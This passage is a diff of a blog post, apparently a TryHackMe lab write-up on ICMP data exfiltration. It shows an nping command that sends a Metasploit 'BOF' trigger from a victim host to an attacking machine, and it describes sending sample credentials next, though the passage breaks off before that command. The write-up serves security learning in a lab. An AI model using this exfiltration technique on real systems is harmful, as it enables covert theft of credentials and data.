CSpanias/cspanias.github.io/_posts/2023-10-20-Data Exfiltration.md

 2. This room has prepared the `icmp.thm.com` machine as the victim for this task, so we can log into it via SSH (first connect to Jumpbox, and from Jumpbox connect to `icmp.thm.com`).
 This machine has the [NPING](https://nmap.org/nping/) tool installed, which is part of the **NMAP** suite.

     Once logged into the `icmp.thm.com`, we need to send the **BOF trigger** so that Metasploit starts writing to the disk.
-The **BOF trigger** defaults to "*^BOF*", followed by the filename being sent:
+The **BOF trigger** defaults to `^BOF`, where `^` means at the start of the string, thus, we need to have `BOF` first followed by the filename being sent:

     ```shell
     # send the BOF trigger to the attacking machine
     thm@icmp-host:~$ sudo nping --icmp 10.10.106.32 --data-string "BOFfile.txt" -c 1
     ```

 3. Now that we initiated the disk writing process, we can sent the data we want to exfiltrate, for example, the credentials `admin:password`.
-Note that we sent the data without converting it to hex first, Metasploit did that for us:
+Note that we will send the data without converting it to hex first; Metasploit will do it for us:

     ```shell
     # send the data we want to exfiltrate to the attacking machine